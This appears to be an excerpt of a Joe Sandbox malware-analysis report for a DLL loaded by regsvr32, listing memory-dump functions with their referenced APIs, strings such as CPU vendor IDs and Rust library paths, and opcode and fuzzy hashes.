Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ffe88a0397392cae24aef2396902edd7b54e0b97c1db03e01e1204cc263a79
Instruction ID: a680ecbde8cc4b7bdbef631c8e7e354a058abc69b7c4b8348f48bd8880eb1542
Opcode Fuzzy Hash: 88ffe88a0397392cae24aef2396902edd7b54e0b97c1db03e01e1204cc263a79
Instruction Fuzzy Hash: 02E11362E1EE91A1EF258F26950037E66B1FF917CDF06A531DE5E866E0DE7CE4418200

Function 00007FF8A9350370 Relevance: 4.1, Strings: 3, Instructions: 307COMMON

Download Yara Rule

Strings

GenuineI, xrefs: 00007FF8A935077A
Authenti, xrefs: 00007FF8A9350728
HygonGen, xrefs: 00007FF8A9350747

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: Authenti$GenuineI$HygonGen
API String ID: 0-696657513
Opcode ID: cbdd5d58124e4f555779748abe59a30f07d77fc9b7afe3c8bbfd874848072354
Instruction ID: aa604f7db39d27c5141b5e9480dca5f1e230168eb9f827c19641fb8c0c2b7a5d
Opcode Fuzzy Hash: cbdd5d58124e4f555779748abe59a30f07d77fc9b7afe3c8bbfd874848072354
Instruction Fuzzy Hash: 509149A7B25D9106FB5C8995AD36BBA4892B3987C8F08B03DED5F97BC5DC7CC9118200

Function 00007FF8A9350390 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

GenuineI, xrefs: 00007FF8A935077A
Authenti, xrefs: 00007FF8A9350728
HygonGen, xrefs: 00007FF8A9350747

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: Authenti$GenuineI$HygonGen
API String ID: 0-696657513
Opcode ID: f6c81d16420a9f78b77baa837ac659d92e39546399ca030d17bf482b8cf666a2
Instruction ID: 0f7851b84e8e2219fd5c9d9eacb4ffe914fa8d426b34f134dc7f6edf64e21f2b
Opcode Fuzzy Hash: f6c81d16420a9f78b77baa837ac659d92e39546399ca030d17bf482b8cf666a2
Instruction Fuzzy Hash: 5D9138A7B25D9106FB5C89A5AD36BBA0892B3587C8F08B03DED5F97BC5DC7CC9118240

Function 00007FF8A9313B00 Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 417COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A9313B2D

Strings

punycode{-0, xrefs: 00007FF8A93140A8

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memset
String ID: punycode{-0
API String ID: 2221118986-3751456247
Opcode ID: 893e507bd43efc9cc9c57fb6103354fae32e85734b3eda83da799c2ccc7cd5f7
Instruction ID: 795c96b81a76894aa9e3cead6561c6c374e312eca58f42aa16a285bd569bda5b
Opcode Fuzzy Hash: 893e507bd43efc9cc9c57fb6103354fae32e85734b3eda83da799c2ccc7cd5f7
Instruction Fuzzy Hash: 06F1E362B1EAC596EF648F2AD8087F927A2EB487D4F209131CD1D4BBE4EE3DD5418300

Function 00007FF8A9363FA0 Relevance: 3.2, APIs: 1, Instructions: 1901COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A9363FE4

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d81c44475a19ba5791806e710b7e777816eb1e1e7972d650a539e079f6a784b2
Instruction ID: be6e317ee16a0256505a8e34dbbf43483faacf5d01c5c997c930a048176ea3c7
Opcode Fuzzy Hash: d81c44475a19ba5791806e710b7e777816eb1e1e7972d650a539e079f6a784b2
Instruction Fuzzy Hash: A9133537A0EAD186D7248F28E0546AEBBB1F784788F554235DBCA93794DB3DE815CB00

Function 00007FF8A9320D40 Relevance: 2.7, APIs: 2, Instructions: 187memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A9320DCB
HeapFree.KERNEL32(?,?,FFFFFFFF,00000000,00000000,FFFFFFFF,00000000,FFFFFFFF,?,?,00007FF8A933D1D5), ref: 00007FF8A9320FFC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeapmemcpy
String ID:
API String ID: 673829100-0
Opcode ID: fea94eadc03ff09373685d8148ce72b79cdd2bb60ea87660c4fc7b15abef1a5c
Instruction ID: b538d6e7ae43ff24691b5e59e0f24a6e21c80620cb39a586eab0119e4af3bee3
Opcode Fuzzy Hash: fea94eadc03ff09373685d8148ce72b79cdd2bb60ea87660c4fc7b15abef1a5c
Instruction Fuzzy Hash: BE61F552A0EED1A9FB108E6584413FE1B60EB247D8F44A934DE0E8B7C6DE3CD1889350

Function 026EFC28 Relevance: 2.3, Strings: 1, Instructions: 1070COMMON

Download Yara Rule

Strings

@, xrefs: 026EFCE3

Memory Dump Source

Source File: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26e0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
Instruction ID: 03e492f1f0be96a1361e2d69612de1f35194d262457e22f65498985860e29a80
Opcode Fuzzy Hash: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
Instruction Fuzzy Hash: A1729331618B488BDFA9DF28C8857AA73E1FB98314F54462DD98BC7246DF34E542CB81

Function 00007FF8A9322C40 Relevance: 2.1, Strings: 1, Instructions: 810COMMON

Download Yara Rule

Strings

.debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_types.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo., xrefs: 00007FF8A9323C99

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_types.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.
API String ID: 0-210007371
Opcode ID: 029002b0872862fefe9719ae94c9da13ee695207b1f64218b6a8122cf48e6c4e
Instruction ID: 6addc1888cb80832cbc8dcd180ea3961a66d3dfbce1b6a65cf0ca3365376fc5a
Opcode Fuzzy Hash: 029002b0872862fefe9719ae94c9da13ee695207b1f64218b6a8122cf48e6c4e
Instruction Fuzzy Hash: 7B621762B0EED595EB258F2599047F86760FB24BD8F469231CF6E67785EF38A184C300

Function 00007FF8A9332190 Relevance: 2.0, Strings: 1, Instructions: 799COMMON

Download Yara Rule

Strings

assertion failed: offset != 0 && offset <= len, xrefs: 00007FF8A9333756

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: assertion failed: offset != 0 && offset <= len
API String ID: 0-3868694986
Opcode ID: fc82270816e37a24e8600c134183b93b69469625b4b44c52c60623a22e056b2f
Instruction ID: 9b68c8c568d69a1cd70f6688dcecb7e8d318b4891e6d4faf6c5cf2e7a8068649
Opcode Fuzzy Hash: fc82270816e37a24e8600c134183b93b69469625b4b44c52c60623a22e056b2f
Instruction Fuzzy Hash: A5825A32609FC599E7648F25D8447EA37B4F708BD8F50A12ADA5D8BB98DF38D691C300

Function 00007FF8A9362F60 Relevance: 2.0, APIs: 1, Instructions: 785COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF8A936304C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 14ba09119254a79aac693d594f95a58e781b69148d3a3974880bb117a83d521c
Instruction ID: 1525f6873033da9e1c7ecdb97c12a91af6f218cacdee7f81a2b119763e08603f
Opcode Fuzzy Hash: 14ba09119254a79aac693d594f95a58e781b69148d3a3974880bb117a83d521c
Instruction Fuzzy Hash: 30622272B1EAC197EB248F18D4446BAB7A1FB987C4F459235DB0993B84DF3DE9058B00

Function 00007FF8A933A650 Relevance: 1.7, Strings: 1, Instructions: 478COMMON

Download Yara Rule

Strings

assertion failed: offset != 0 && offset <= len, xrefs: 00007FF8A933ACD9

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: assertion failed: offset != 0 && offset <= len
API String ID: 0-3868694986
Opcode ID: 9b7d7e6261e871f7acdda3337dc0793cc68cfd2c0e16093e62050b4d6ce134c0
Instruction ID: 517519b5a594bdcc79162cc9108c6b1be9342b9c76f888818bd94cbbe03957a3
Opcode Fuzzy Hash: 9b7d7e6261e871f7acdda3337dc0793cc68cfd2c0e16093e62050b4d6ce134c0
Instruction Fuzzy Hash: E902F262E4DEC562FA158F54E5051FA7332EB64BC8F44A631CE5E93791EF2CA685C300

Function 00007FF8A930CEE0 Relevance: 1.6, APIs: 1, Instructions: 349COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF8A930CF52

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 74dd6c494fcb9b2839005b4ad277bfc45a9d454dac80b88301c9db28ca6d3208
Instruction ID: 433661335c00591a1feeb8f47daa41b7667996b094c70adaeb3b78c7584d60fc
Opcode Fuzzy Hash: 74dd6c494fcb9b2839005b4ad277bfc45a9d454dac80b88301c9db28ca6d3208
Instruction Fuzzy Hash: 66C11662B1EBE562FA54CEA19814BBA66E5F700BD4F40A5B0DD2E83BC0CF3CE5519300

Function 00007FF8A930D9C0 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899library\core\src\fmt\mod.rs, xrefs: 00007FF8A930D9E6, 00007FF8A930DC21

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899library\core\src\fmt\mod.rs
API String ID: 0-4235933832
Opcode ID: 4e06a977fbf9b96e3a59d2d40dc87019d3499e67476bdb34b55511c747bd1b2b
Instruction ID: fd4aa69c8ab3c9398463022e6eed97ab366c06a8e9645758d50fb49ef2c4a3b8
Opcode Fuzzy Hash: 4e06a977fbf9b96e3a59d2d40dc87019d3499e67476bdb34b55511c747bd1b2b
Instruction Fuzzy Hash: 16D12372B1DB9192EB208F59E0007A96BF1FB947D4F906235DAAE87BE4DA3CC541C700

Function 00007FF8A931DC00 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899library\core\src\fmt\mod.rs, xrefs: 00007FF8A931DC49, 00007FF8A931DD55, 00007FF8A931DDF0

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899library\core\src\fmt\mod.rs
API String ID: 0-4235933832
Opcode ID: d2a53728b6ba352af54ea60689c1565f2431fc3356c7a030aebb1cadf41539e0
Instruction ID: 6727d92c22ba7a464ed01165257e13fbc8450caf120b9178331629ae362b2794
Opcode Fuzzy Hash: d2a53728b6ba352af54ea60689c1565f2431fc3356c7a030aebb1cadf41539e0
Instruction Fuzzy Hash: C4A12762B0DAD155EB208F29D0007B86771EB667E4F906331DBBE87BE5DA3D9605C301

Function 00007FF8A934ED50 Relevance: 1.5, APIs: 1, Instructions: 221COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A934EE7D

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: b35705b82ebd302b43ea39ff4b2c0997ad7702e75a0b2371ae5de3245c21d6e5
Instruction ID: 49eee9778535b47f50bbf2826b66d03fbc15589cc5c18bc21cb7256034698061
Opcode Fuzzy Hash: b35705b82ebd302b43ea39ff4b2c0997ad7702e75a0b2371ae5de3245c21d6e5
Instruction Fuzzy Hash: F381C062F0EAA1A6FB50CF6198043BD2671FF847C8F529535DE1E93785EF38A9818304

Function 00007FF8A9312AA0 Relevance: 1.5, APIs: 1, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc0673226893604a71a31a118a064639cbe924e0cf5e86571a392e00cba467a
Instruction ID: 32db24cf6427097e6e95dae4f35dedd665298d1635247d138a28ab1264e8ef9f
Opcode Fuzzy Hash: 5dc0673226893604a71a31a118a064639cbe924e0cf5e86571a392e00cba467a
Instruction Fuzzy Hash: BB81B163B0EED5A5EE518F60C4105B927B0FB05BD4FA5A532DE6D837A0EF38E9958200

Function 00007FF8A933CAC0 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

0123456789abcdef, xrefs: 00007FF8A933CC8F

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
